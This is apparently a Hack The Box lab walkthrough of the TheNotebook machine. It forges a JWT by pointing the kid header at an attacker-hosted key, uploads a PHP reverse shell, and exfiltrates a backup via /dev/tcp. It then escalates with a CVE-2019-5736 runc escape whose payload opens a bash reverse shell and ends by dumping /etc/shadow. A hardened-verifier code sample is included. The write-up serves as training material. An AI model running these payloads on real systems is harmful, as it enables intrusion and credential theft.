Hack-The-Box-walkthrough[TheNotebook]

Introduction

OS: Linux
Difficulty: Medium
Points: 30
Release: 06 Mar 2021
IP: 10.10.10.230

  • my htb rank

information gathering

First, run nmap as usual. Only SSH and HTTP are open (10010/tcp shows as filtered, so there is nothing to work with there):

┌──(root💀kali)-[~/hackthebox/machine/thenotebook]
└─# nmap -sV -v -p- --min-rate=10000 10.10.10.230
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http nginx 1.14.0 (Ubuntu)
10010/tcp filtered rxapi
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

webpage

Register, write notes, and the app assigns a UUID and an auth cookie.

The captured request:

POST /a22c35fe-ccb9-4128-971a-0f96e2b9108d/notes/add HTTP/1.1
Host: 10.10.10.230
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 20
Origin: http://10.10.10.230
Connection: close
Referer: http://10.10.10.230/a22c35fe-ccb9-4128-971a-0f96e2b9108d/notes/add
Cookie: auth=eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsImtpZCI6Imh0dHA6Ly9sb2NhbGhvc3Q6NzA3MC9wcml2S2V5LmtleSJ9.eyJ1c2VybmFtZSI6Imx1Y2lmZXIxMSIsImVtYWlsIjoiMTE4NTE1MTg2N0BxcS5jb20iLCJhZG1pbl9jYXAiOjB9.i2HuA6-7YK2MniK6nuBOrwxvGRgJf0cZkUif2bNYN77BSZBkuqOducOZI-BuAGPZKrLelZhecaZxVW1OtsaTuM0-fyz48ar5I34K78FDazAtgWbuIb8atjZQG2Vo3OAFO4gv4Jlys5Vl8V7XZSgdW_DrJt8pSL0nSajDAG5dQCwlv0phweF19KifvADNQGlo_woN7QsK25lsp8LQIUdVn2jj0q7B0V1h7gLu7lIs1r9YhZrpmMG-Q0cnCscnN6o-IwnwP4h4SjHEQWBLPuhbCw9yodvJhzKo_hqIGASha98NjXgt43ruBaPSCPlJEaLNnfilQbC9jkLjiEQyifQmh62VptzBLVrgaUwKcxBkalJdyt8UUCw_77dTMXr202QsS-05wFkWVd_03yKgQFNL2whlIwKa_F5jyclxRa8SWJ3CQrM0PMhLPPzhp4XKvGGo00OJjLHodwV0EEVq1VrunsnFEkp-yg81Ms0z8_fejSWCoqdVaThf6uuK-_XpvS49pV8tnkvUa3U4slnJqhk2LaUuW3CGGGXTRvbEw1CVQPcrK64tIZzzVm7iT05sybOUBJIQGVcYsWbGfrvwitPBxrKXTlFpau5cxv9M5MkfjcDMl5qh0-xUAcH4qv5TO18BFRVvNosbmdPkIyibbBhSMTTd_ZRJlZyvBHP1LItD6lg; uuid=a22c35fe-ccb9-4128-971a-0f96e2b9108d
Upgrade-Insecure-Requests: 1

title=test&note=test

uuid:

a22c35fe-ccb9-4128-971a-0f96e2b9108d

cookie:

auth=eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsImtpZCI6Imh0dHA6Ly9sb2NhbGhvc3Q6NzA3MC9wcml2S2V5LmtleSJ9.eyJ1c2VybmFtZSI6Imx1Y2lmZXIxMSIsImVtYWlsIjoiMTE4NTE1MTg2N0BxcS5jb20iLCJhZG1pbl9jYXAiOjB9.i2HuA6-7YK2MniK6nuBOrwxvGRgJf0cZkUif2bNYN77BSZBkuqOducOZI-BuAGPZKrLelZhecaZxVW1OtsaTuM0-fyz48ar5I34K78FDazAtgWbuIb8atjZQG2Vo3OAFO4gv4Jlys5Vl8V7XZSgdW_DrJt8pSL0nSajDAG5dQCwlv0phweF19KifvADNQGlo_woN7QsK25lsp8LQIUdVn2jj0q7B0V1h7gLu7lIs1r9YhZrpmMG-Q0cnCscnN6o-IwnwP4h4SjHEQWBLPuhbCw9yodvJhzKo_hqIGASha98NjXgt43ruBaPSCPlJEaLNnfilQbC9jkLjiEQyifQmh62VptzBLVrgaUwKcxBkalJdyt8UUCw_77dTMXr202QsS-05wFkWVd_03yKgQFNL2whlIwKa_F5jyclxRa8SWJ3CQrM0PMhLPPzhp4XKvGGo00OJjLHodwV0EEVq1VrunsnFEkp-yg81Ms0z8_fejSWCoqdVaThf6uuK-_XpvS49pV8tnkvUa3U4slnJqhk2LaUuW3CGGGXTRvbEw1CVQPcrK64tIZzzVm7iT05sybOUBJIQGVcYsWbGfrvwitPBxrKXTlFpau5cxv9M5MkfjcDMl5qh0-xUAcH4qv5TO18BFRVvNosbmdPkIyibbBhSMTTd_ZRJlZyvBHP1LItD6lg;

The auth cookie is a JWT (three base64url segments separated by dots). Let's decode it at:

https://jwt.io/

Pasting the token into jwt.io gives something interesting:

HEADER:

{
"typ": "JWT",
"alg": "RS256",
"kid": "http://localhost:7070/privKey.key"
}

PAYLOAD:

{
"username": "lucifer11",
"email": "1185151867@qq.com",
"admin_cap": 0
}

VERIFY SIGNATURE:

RSASHA256(
base64UrlEncode(header) + "." +
base64UrlEncode(payload),
...
...
)

RS256 means the token is signed with RSA over SHA-256 (an RSA key pair, not GPG), and the kid (key ID) header is a URL: the application apparently fetches the verification key from http://localhost:7070/privKey.key when it checks the signature. If the server follows whatever kid we supply, we can point it at a key pair we control.

  • Navigating RS256 and JWKS

Research (and jwt.io itself) confirms the approach: generate our own RSA key pair, sign a modified payload with our private key, and set kid to a URL we host so the server verifies the forgery against our key.

Let's build one. First, generate a new RSA key pair:

  • jwtRS256.sh
┌──(root💀kali)-[~/hackthebox/machine/thenotebook]
└─# ssh-keygen -t rsa -b 4096 -m PEM -f jwtRS256.key
Generating public/private rsa key pair.
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in jwtRS256.key
Your public key has been saved in jwtRS256.key.pub
The key fingerprint is:
SHA256:SS1PrGQQT5jFz4OlkxA7O9gn5zFde0t9jBr26pulXvg root@kali
The key's randomart image is:
+---[RSA 4096]----+
| +Bo |
| +=.o. |
| o.*B+ . |
| o *=B+. . + |
| . = S.o.+ + +|
| * o . B ..|
| . o = |
| B |
| oB.E |
+----[SHA256]-----+
┌──(root💀kali)-[~/hackthebox/machine/thenotebook]
└─# openssl rsa -in jwtRS256.key -pubout -outform PEM -out jwtRS256.key.pub
writing RSA key
┌──(root💀kali)-[~/hackthebox/machine/thenotebook]
└─# cat jwtRS256.key
-----BEGIN RSA PRIVATE KEY-----
MIIJKQIBAAKCAgEAvI/xUwgbHsfS7jZa7vCu6NsGOZLqjWGMfY3JhL3O10SSe9CD
Y4VB0DtHA2Y8yKA1C1hjI2odVgvxmcLgvylhUccd/Fgo2CENr5Ez/K5nbPkMSG8K
373AspZjx4jvM25G/K9EX1bh5PWt/mH8G/Sgr4G0D1JqFbro0p6UK7gdzw/OG3kH
hz4vUKK8sq/ueZBi8Dhu78UhDqUkROQYmdo+TeF4AAN7ZWYx1DebEq+u47opdqwT
60NUmbA+qccc8vdsFwERpcE1eYg6JVRyZUTH8cF6shelSpeTtluvBG+9NvNhPOzZ
PW56gMG4Q3lw/5YeUiZMRaOTcKk+fk9Issbos2UuN1I0omFxMNVKjRSK/+EN69LK
ui35KpaHpqiZ3tJlHtebN9WURIsd0KV+3r/1Z1h3fMQh1gXlDKy7ps8YqMDi2PiJ
KHj2tkQChIx8KwOvotb1k91jLGoPqYiJi2IzgURN/zSCFcr3EGAbZg1XmaIMmOV6
F5S9LmU/v1YIB5TjDDPvdaFr/wPwZZd9fLkwbS8zpNr1geICqcyGqv3cfTUjVf5g
I0Z+j3qUNJLBGYRQu8FZ3yCi0m4ygrAn3vWyyFWxk2ABwTry9cA2kZv8rhbxFuvG
7i9ibF1sVHPxi21UrXtzFNKheVAJm+qs0G+jv/fPmz07ZQXi9Gw8Lukz6IcCAwEA
AQKCAgEAjBcdIaUaEQpAib5UXMTwDgv7Wfbuz88zg2w91aL28zP86IQHuX6dYMlJ
fxsL+boc7qriLMN/vBfvjV8dfqiNpyYZ/wq4fapA8rkcOJSSPoHhQEdPet8NNSFK
TEpN/JXno3/LelGgTmzAsge2OEbMwtfIIMIIEtDkfOZYCwslClshs4N9tlra6Duf
mdnfgO1mtDYZJYX9g1Xp1kzoghWEyHPEpa3wlWsRhisxyPZBJut+Nq6ttdI2HmC0
jYpi1ZhA8+5VYCJlSj+Ng4Jz4wzwx4oJUBsFMJ/gnFENfGxP1W2IRq1o0J0t4k8K
SQcGjrzHFh1h+TMILWFwDoN07W2eH7L52tktcRNtUDRqYViILacPXykrD04y0fKt
mt9+3jLnxqlPZo+9wpkLxljs0aNj5tbEhpP2yNDy3MaICvm97yS23L44tZShlbna
R6VBjpLzGivKPvyCBmQrfIp4UYznBCDToY1QPffHszJR/3q2qje/If0d1LMeBMpM
WOQABr14bgkbZjIJ7Sm4z3H+a/K+Mj/DoRM7+PXieW9J1lLeQzeYkvrMqpG3lP22
dUSKDn8MhUh6JwgQ4qSchPULcWM3EYPeNNekXJJ5uK4/arqPkzimvR3MHBGlaO/7
SsfCBmudNzruStyf0a/eqe/BsQ9kSL1NUqDJmkkyFWJT5Si73zECggEBAOkN8W2w
oKGTVfVkS0qZuhWGX1gOazx9KDaec2RJJfs8qHWU6v0e42HoCLFp9PvM0bmuPpQR
C/eUZIe14exV4Ud2Qkme4QghUZJw6XzHBiap6h8AqeYM+3VDdwY4O10ZzQiauWdB
cK2z6n+8mClskbpWFcLyOJOoS+wZE+G2w/5ioyBov54NrbEFKmYxZzGImNGo4XqZ
myrFeLK6XR7nWtW9tllFdJl2Iwynv+0kjjkGlNQWdpfeOlU1CsrjI/uUinlkHZZ2
F2VLE1VpZFiu75uiepPAVBL998JdDLM4/UnCNBX6FRzNJ0knt3QIGxMr0GTe1Y5U
x8W11L2iLpLKkIMCggEBAM8gluNeMRXxy1g5rYFAU8YupkVpCJk0wWQ20Uxx9pFT
IEloUN3yJ52q18aNzpUitzFYFBdzvyG3xfhDpRk59RDuep9IDrEpS3A3AboIDJSV
LcBgnsQMGCDLkAjA/LWsfr3cy+FJH88iQsXgIACNEec43SV0e0J5RtTh4a5WUW3P
mvbaeH1pJyCEqCZnYfYD2yXqaGb3vXFzWakLS0p5u/6SP5bOFIbvNtM2P5HmArEd
0SLVD6qjikhrYPFJHPJQL7u6HPP9hjFxsSRGAV8NcWF7L+pn3FFcm5xk2fnWQAVq
ZSntBH1xEBtX/jwYUne6Z1ZW3hwyor8AeMx9jI76wK0CggEAL1IYcnhJtWUQMBpk
O0qJgTNeiqeq2IZlMunrbjJ4FtJTNkS9jhXGf6u4kCV+i94ju3sI09G+R1AHNZMV
w4IQkw0NGpu6/4acZIqurhpPQmx/0Dm3RbHfIQlI0qd6TkYd3qBkAvZDpdGBTNyD
XO3hjR9LneDG4hxrBg51fgA5PZ7TlpIOTk5itS3iVQu081bUCMYsulMUMZQVFN1I
aSz6wamaq/exXDOjnD83djRU+HlAoOvKur1xxLlXbqi+NqgLkehlJZbm2zdqPo5+
xI8IseZE01la+Nw+gWWZXY61x1M6djfoL4fscSsyUcoPjU35K3IflJ3cTmXEQ5j5
se6VdwKCAQBKXADPj7k/j5bZDZvkkxuAQq8erB6SIgZr2+I395H1ikpFEFY31/+w
8uyUM8S+dcAezugnoz4y9K71+hMDg3MfqP4MwOnFYHXcy2KrTsh1bzkFn6pf55eh
7nK/McmHz22Q6/ul3YK18i7WqyfSCtMql5eNIsw9iRyMwKss04BYU/fmN3iaTW3m
lrlnUCYzFB9Q9V6V2MsCN88wiQV2r012jzqVAVcNOkQMf6VC07iTrYivYJ5HPH8g
kKw083KY64C3fJF4ZsQObCqUQy2q2kCiJn+FP9QwwXZ8Jxi6QNirGQ9IhfbesgB+
UJDNMk4o/ZqrvHPw25zhxWGYyFn12r/hAoIBAQCahA0wJFvy019pTVAtI6O9oflV
T69IJyTGIf4jO/kFBmRGJIGu7EPm1Grt6aWV+MZEoUopc4mOethZIbzsxmIVRyx9
8u+LbbWGVgv9XZbcTZLUR5KVxM1KFslL6e/vELY/AVt081RJf1xf1eT1KiP3i80h
xSGQJS8sDD3nxKzdaDKhi0hIgbUAgdLOq4fwMDZYmczhU16aMwHP6s0sY+ctLoEh
d6uHFkfmWYIGSkFXC93626yTHyjOzY9ytwxQ+f7L10eioeVRZRDa2cb2wnNGfYmU
DUbLgDbMRQxjxu4i6mun5NlWvFMYESN2CnpvpiPfLKBdoH1qTF4zo1vwu3Qh
-----END RSA PRIVATE KEY-----
┌──(root💀kali)-[~/hackthebox/machine/thenotebook]
└─# cat jwtRS256.key.pub
-----BEGIN PUBLIC KEY-----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-----END PUBLIC KEY-----

Now, in jwt.io, set the header and payload to match the original token with two changes: replace localhost in kid with your own tun0 IP (here 10.10.14.5), and set admin_cap to true. Paste the generated key pair into the signature fields and make sure the algorithm stays RS256; jwt.io should report the signature as verified.

Before swapping the cookie, rename the private key to privKey.key, since that is the filename the kid URL points at, and serve its directory on port 7070 so the application can fetch it when it verifies our token.

The new cookie/token (from jwt.io's left-hand pane):

eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsImtpZCI6Imh0dHA6Ly8xMC4xMC4xNC41OjcwNzAvcHJpdktleS5rZXkifQ.eyJ1c2VybmFtZSI6Imx1Y2lmZXIxMSIsImVtYWlsIjoiMTE4NTE1MTg2N0BxcS5jb20iLCJhZG1pbl9jYXAiOnRydWV9.Tv-XaYQuY71cIYcsBnYoDrrUUyDDs3u9Q-gIdkYVfZAFZJDn4EQYuQ0McwoPK_CX_puFmwiX7TzCqeL3y5tTlgZCeYKiaPo3fwRxr2LgmTAvoHMjXy-oD5VzgZWmutgPUtPEO5v7kRPrHM0etc-_f5HPNqpTXGJe1n0lSxipoc35X-MHWzhG3ymr41iN3aWQ8wcIJ2oFPKlcxadd8_l2byDYlnmGTU4_etYL48IG18ZRkDbDRE1LOiGId25LmjnHCblqFi5gDroL8DdyT-LuyqPYy1DCYSmkBHnnjZTCJWzKbPNv5JlnKC3Lr3JoLYZSaEFUbqYjnIScoBI5eaE5k54OLkQRRhDwxg33oxNiALiactRg_inHhhryCeBjSvqRfHDsutZj-WAwwSTDDl32N2n5TyXRzUuMteTTG087EzPMv694Y9twdIKEe5go2N0uTkcBBBGcRK7zE6Utx3011Gl45bd1a6WgVw1oyL1APAqsws60-P3UHEGdqLQbmSZSoHTrSWtvdEKEvDblYqMMgOIBX7pZRGFFYnbX_yr59FiLH8wDOpQ4wkOUgDfPKZaDWJUuqZOnzaAgOdOSKYl_L5ktzfwY704Dn9BVvnMGU4xM1S7wSM7020jQnC2VQukx1VyYgEAZzYAPWikkGxcDoFbh5sXTzLhmsn7oB9pASAs

Set the new token as the auth cookie; the server immediately fetches our key:

┌──(root💀kali)-[~/hackthebox/machine/thenotebook]
└─# ls
jwtRS256.key.pub privKey.key
┌──(root💀kali)-[~/hackthebox/machine/thenotebook]
└─# python -m SimpleHTTPServer 7070
Serving HTTP on 0.0.0.0 port 7070 ...
10.10.10.230 - - [08/Mar/2021 23:26:41] "GET /privKey.key HTTP/1.1" 200 -

Now we are admin (I edited the auth cookie with the Firefox Cookie-Editor extension).

Every page load triggers another fetch of privKey.key, so the key is fetched on each verification rather than cached:

┌──(root💀kali)-[~/hackthebox/machine/thenotebook]
└─# python -m SimpleHTTPServer 7070
Serving HTTP on 0.0.0.0 port 7070 ...
10.10.10.230 - - [08/Mar/2021 23:26:41] "GET /privKey.key HTTP/1.1" 200 -
10.10.10.230 - - [08/Mar/2021 23:28:57] "GET /privKey.key HTTP/1.1" 200 -
10.10.10.230 - - [08/Mar/2021 23:29:01] "GET /privKey.key HTTP/1.1" 200 -

So keep the SimpleHTTPServer running for as long as we use the forged cookie.
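To make the flaw concrete, here is an added, self-contained Python model of the whole exchange; it is not code from the original post or from the box. It implements RS256 (RSA PKCS#1 v1.5 over SHA-256) from scratch with the standard library so it runs offline, mints a legitimate token and a forged admin_cap token the way we did in jwt.io, and then runs both through two verifiers: vulnerable_verify, which, like TheNotebook, dereferences the kid header as a URL and trusts whatever key it finds there, and hardened_verify, which treats kid as an opaque name looked up in a set of keys pinned at deploy time. The hosted dict is a constructed stand-in for the HTTP fetch to port 7070 (no network is touched, and it hands back key material directly rather than parsing the PEM file the real app downloaded); the function names, the key sizes and the pinned-key set are illustrative, and the keys are generated fresh on each run.

```python
import base64, hashlib, json, random

SHA256_DIGESTINFO = bytes.fromhex("3031300d060960864801650304020105000420")  # DER DigestInfo prefix for SHA-256 (RFC 8017 9.2)
_rng = random.SystemRandom()

def b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))

def is_probable_prime(n: int, rounds: int = 32) -> bool:
    # Miller-Rabin: fine for a demo key, use a vetted library for anything real.
    d, r = n - 1, 0
    while d % 2 == 0:
        d, r = d // 2, r + 1
    for _ in range(rounds):
        x = pow(_rng.randrange(2, n - 1), d, n)
        if x in (1, n - 1):
            continue
        for _ in range(r - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False
    return True

def _gen_prime(bits: int) -> int:
    candidates = iter(lambda: _rng.getrandbits(bits) | (1 << (bits - 1)) | 1, None)  # top bit set, odd
    return next(c for c in candidates if is_probable_prime(c))

def generate_rsa_keypair(bits: int = 2048):
    # Returns (public, private) as dicts of integers; e = 65537 as ssh-keygen and openssl use.
    e = 65537
    while True:
        p, q = _gen_prime(bits // 2), _gen_prime(bits // 2)
        phi = (p - 1) * (q - 1)
        if p != q and phi % e:
            break
    return {"n": p * q, "e": e}, {"n": p * q, "d": pow(e, -1, phi)}  # modular inverse: Python 3.8+

def _emsa_pkcs1_v15(message: bytes, k: int) -> int:
    # EMSA-PKCS1-v1_5: 00 01 FF..FF 00 || DigestInfo(SHA-256(message)), read as a big integer.
    t = SHA256_DIGESTINFO + hashlib.sha256(message).digest()
    return int.from_bytes(b"\x00\x01" + b"\xff" * (k - len(t) - 3) + b"\x00" + t, "big")

def rs256_sign(signing_input: bytes, priv: dict) -> bytes:
    k = (priv["n"].bit_length() + 7) // 8
    return pow(_emsa_pkcs1_v15(signing_input, k), priv["d"], priv["n"]).to_bytes(k, "big")

def rs256_verify(signing_input: bytes, sig: bytes, pub: dict) -> bool:
    k = (pub["n"].bit_length() + 7) // 8
    return len(sig) == k and pow(int.from_bytes(sig, "big"), pub["e"], pub["n"]) == _emsa_pkcs1_v15(signing_input, k)

def mint_token(payload: dict, kid: str, priv: dict) -> str:
    # header.payload.signature, what jwt.io produced for us, with kid under our control
    header = {"typ": "JWT", "alg": "RS256", "kid": kid}
    enc = lambda obj: b64url(json.dumps(obj, separators=(",", ":")).encode())
    signing_input = f"{enc(header)}.{enc(payload)}"
    return f"{signing_input}.{b64url(rs256_sign(signing_input.encode(), priv))}"

def _split(token: str):
    h, p, s = token.split(".")
    return json.loads(b64url_decode(h)), json.loads(b64url_decode(p)), f"{h}.{p}".encode(), b64url_decode(s)

def vulnerable_verify(token: str, fetch_key):
    # TheNotebook's flaw: kid is treated as a URL and the key is fetched from wherever it points.
    header, payload, signing_input, sig = _split(token)
    pub = fetch_key(header.get("kid"))  # attacker-chosen location, hence attacker-chosen key
    ok = pub is not None and header.get("alg") == "RS256" and rs256_verify(signing_input, sig, pub)
    return payload if ok else None

def hardened_verify(token: str, trusted_keys: dict):
    # kid is only an opaque name looked up in keys pinned at deploy time; nothing is fetched.
    header, payload, signing_input, sig = _split(token)
    pub = trusted_keys.get(header.get("kid"))
    ok = pub is not None and header.get("alg") == "RS256" and rs256_verify(signing_input, sig, pub)
    return payload if ok else None

def demo(bits: int = 2048) -> dict:
    server_pub, server_priv = generate_rsa_keypair(bits)
    attacker_pub, attacker_priv = generate_rsa_keypair(bits)
    server_kid = "http://localhost:7070/privKey.key"     # kid in the cookie the app issued
    attacker_kid = "http://10.10.14.5:7070/privKey.key"  # kid we set in jwt.io
    # Constructed stand-in for the app's HTTP fetch: URL -> the key material found there.
    hosted = {server_kid: server_pub, attacker_kid: attacker_pub}
    legit = mint_token({"username": "lucifer11", "admin_cap": 0}, server_kid, server_priv)
    forged = mint_token({"username": "lucifer11", "admin_cap": True}, attacker_kid, attacker_priv)
    h, _, s = legit.split(".")  # admin_cap flipped without re-signing: rejected everywhere
    tampered = f"{h}.{b64url(json.dumps({'username': 'lucifer11', 'admin_cap': True}).encode())}.{s}"
    return {
        "legit_vulnerable": vulnerable_verify(legit, hosted.get),
        "forged_vulnerable": vulnerable_verify(forged, hosted.get),  # accepted: this is the bug
        "tampered_vulnerable": vulnerable_verify(tampered, hosted.get),
        "legit_hardened": hardened_verify(legit, {server_kid: server_pub}),
        "forged_hardened": hardened_verify(forged, {server_kid: server_pub}),  # rejected: unknown kid
    }
```

Call demo() to see the five outcomes (the RSA is pure Python, so 2048-bit keys take a few seconds; demo(1024) is enough for a quick run). The two verifiers differ only in where the key comes from: following the kid URL lets the token carry its own verification key, which is what made the forged admin_cap token valid on the box, while the pinned lookup rejects any kid it has not been configured with. Both also pin alg to RS256, which separately closes the alg=none and RS256-to-HS256 confusion issues, and the tampered case shows that the signature still binds the payload: editing admin_cap without re-signing fails even against the vulnerable verifier.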

As admin we can upload files. I uploaded php-reverse-shell.php and got a reverse shell:

┌──(root💀kali)-[~/hackthebox/machine/thenotebook]
└─# nc -lvp 5566
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::5566
Ncat: Listening on 0.0.0.0:5566
Ncat: Connection from 10.10.10.230.
Ncat: Connection from 10.10.10.230:50278.
Linux thenotebook 4.15.0-135-generic #139-Ubuntu SMP Mon Jan 18 17:38:24 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
04:37:59 up 9:48, 0 users, load average: 0.08, 0.03, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ whoami
www-data

user

In /var/backups/ there is a home.tar.gz file that www-data can read.

Send it to our box over a raw TCP socket (bash's /dev/tcp):

www-data@thenotebook:/var/backups$ cat home.tar.gz > /dev/tcp/10.10.14.5/4444

Receive it on the attacking machine:

┌──(root💀kali)-[~/hackthebox/machine/thenotebook]
└─# nc -lvp 4444 > home.tar.gz
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.10.10.230.
Ncat: Connection from 10.10.10.230:45076.

Extracting the archive reveals noah's SSH key pair:

┌──(root💀kali)-[~/hackthebox/machine/thenotebook]
└─# tar -xvf home.tar.gz
home/
home/noah/
home/noah/.bash_logout
home/noah/.cache/
home/noah/.cache/motd.legal-displayed
home/noah/.gnupg/
home/noah/.gnupg/private-keys-v1.d/
home/noah/.bashrc
home/noah/.profile
home/noah/.ssh/
home/noah/.ssh/id_rsa
home/noah/.ssh/authorized_keys
home/noah/.ssh/id_rsa.pub

Fix the key permissions (ssh refuses a private key that is readable by others), log in as noah and read the user flag:

┌──(root💀kali)-[~/hackthebox/machine/thenotebook]
└─# chmod 600 home/noah/.ssh/id_rsa
┌──(root💀kali)-[~/hackthebox/machine/thenotebook]
└─# ssh -i home/noah/.ssh/id_rsa noah@10.10.10.230
The authenticity of host '10.10.10.230 (10.10.10.230)' can't be established.
ECDSA key fingerprint is SHA256:GHcgekaLnxmzAeBtBN8jWgd3DME3eniUb0l+PDmejDQ.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.230' (ECDSA) to the list of known hosts.
Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 4.15.0-135-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

System information as of Tue Mar 9 04:45:53 UTC 2021

System load: 0.0 Processes: 182
Usage of /: 42.1% of 7.81GB Users logged in: 0
Memory usage: 19% IP address for ens160: 10.10.10.230
Swap usage: 0% IP address for docker0: 172.17.0.1


61 packages can be updated.
0 updates are security updates.

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Tue Mar 9 03:28:09 2021 from 10.10.14.41
noah@thenotebook:~$ id
uid=1000(noah) gid=1000(noah) groups=1000(noah)
noah@thenotebook:~$ whoami
noah
noah@thenotebook:~$ ls
home user.txt
noah@thenotebook:~$ cat user.txt
c3f30f818132c77d26eae145351809ac

root

noah@thenotebook:~$ sudo -l
Matching Defaults entries for noah on thenotebook:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User noah may run the following commands on thenotebook:
(ALL) NOPASSWD: /usr/bin/docker exec -it webapp-dev01*

The sudo rule lets noah run docker exec into the webapp-dev01 container as root without a password, which gives a root shell inside the container but not on the host. Searching for a container escape turns up CVE-2019-5736, a runc vulnerability in which a malicious container overwrites the host's runc binary the next time someone runs docker exec into it. The following PoC implements it:

  • CVE-2019-5736-PoC

Edit the payload variable in main.go so that it spawns a reverse shell to our box:

var payload = "#!/bin/bash \n echo 'bash -i >& /dev/tcp/10.10.14.5/4322 0>&1' > /tmp/rev.sh && chmod +x /tmp/rev.sh && bash /tmp/rev.sh"

Build it with: go build main.go

Back on the target, enter the container using the sudo rule:

┌──(root💀kali)-[~/hackthebox/machine/thenotebook]
└─# go build main.go
┌──(root💀kali)-[~/hackthebox/machine/thenotebook]
└─# ls
home home.tar.gz jwtRS256.key.pub main main.go php-reverse-shell.php privKey.key
┌──(root💀kali)-[~/hackthebox/machine/thenotebook]
└─# mv main exp
┌──(root💀kali)-[~/hackthebox/machine/thenotebook]
└─# ls
exp home home.tar.gz jwtRS256.key.pub main.go php-reverse-shell.php privKey.key
noah@thenotebook:~$ sudo /usr/bin/docker exec -it webapp-dev01 bash
root@396a6d12aaa7:/opt/webapp#

Inside the container, fetch the exploit into /tmp, make it executable and run it. It replaces the container's /bin/sh with a trampoline and then waits for the next docker exec so it can write the payload into the host's runc binary through /proc/[pid]/exe:

┌──(root💀kali)-[~/hackthebox/machine/thenotebook]
└─# python -m SimpleHTTPServer 81
Serving HTTP on 0.0.0.0 port 81 ...
10.10.10.230 - - [09/Mar/2021 00:16:57] "GET /exp HTTP/1.1" 200 -
root@396a6d12aaa7:/tmp# wget http://10.10.14.5:81/exp
--2021-03-09 05:20:01-- http://10.10.14.5:81/exp
Connecting to 10.10.14.5:81... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2236814 (2.1M) [application/octet-stream]
Saving to: ‘exp’

exp 100%[=======================================================>] 2.13M 365KB/s in 6.0s

2021-03-09 05:20:07 (365 KB/s) - ‘exp’ saved [2236814/2236814]

root@396a6d12aaa7:/tmp# ls
exp requirements.txt webapp.db
root@396a6d12aaa7:/tmp# chmod 777 exp
root@396a6d12aaa7:/tmp# ./exp
[+] Overwritten /bin/sh successfully
[+] Found the PID: 1091
[+] Successfully got the file handle
[+] Successfully got write handle &{0xc00004d4a0}

Simultaneously, in a second SSH session as noah, exec into the container again with sh. The "No help topic for '/bin/sh'" error is runc itself being invoked with /bin/sh as its argument, which means the trampoline fired and the host runc is being overwritten:

┌──(root💀kali)-[~/hackthebox/machine/thenotebook]
└─# ssh -i home/noah/.ssh/id_rsa noah@10.10.10.230
Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 4.15.0-135-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

System information as of Tue Mar 9 05:32:53 UTC 2021

System load: 0.29 Processes: 207
Usage of /: 42.2% of 7.81GB Users logged in: 1
Memory usage: 21% IP address for ens160: 10.10.10.230
Swap usage: 0% IP address for docker0: 172.17.0.1

=> There is 1 zombie process.


61 packages can be updated.
0 updates are security updates.

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Tue Mar 9 05:23:22 2021 from 10.10.14.5
noah@thenotebook:~$ sudo /usr/bin/docker exec -it webapp-dev01 sh
No help topic for '/bin/sh'

Our payload connects back to port 4322; the listener receives a shell running as root on the host (note the working directory under /run/docker/containerd, which is runc's cwd on the host, not inside the container):

└─# nc -lvp 4322
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::4322
Ncat: Listening on 0.0.0.0:4322
Ncat: Connection from 10.10.10.230.
Ncat: Connection from 10.10.10.230:37578.
bash: cannot set terminal process group (68630): Inappropriate ioctl for device
bash: no job control in this shell
<da0ce3c741b77d5a95dafd4f680fc443d94bcad9564fce056# whoami
whoami
root
<da0ce3c741b77d5a95dafd4f680fc443d94bcad9564fce056# pwd
pwd
/run/docker/containerd/daemon/io.containerd.runtime.v1.linux/moby/ebd846222421782da0ce3c741b77d5a95dafd4f680fc443d94bcad9564fce056
<da0ce3c741b77d5a95dafd4f680fc443d94bcad9564fce056# cd /root
cd /root
root@thenotebook:/root# ls
ls
cleanup.sh
docker-runc
reset.sh
root.txt
start.sh
root@thenotebook:/root# cat root.txt
cat root.txt
4de72defc1cf5263e34f67acc80c6018
root@thenotebook:/root# cat /etc/shadow
cat /etc/shadow
root:$6$OZ7vREXE$yXjcCfK6rhgAfN5oLisMiB8rE/uoZb7hSqTOYCUTF8lNPXgEiHi7zduz1mrTWtFnhKOCZA9XZu12osORyYnKF.:18670:0:99999:7:::

Summary of knowledge

  • Forging the JWT auth cookie by pointing the kid header at an attacker-hosted key
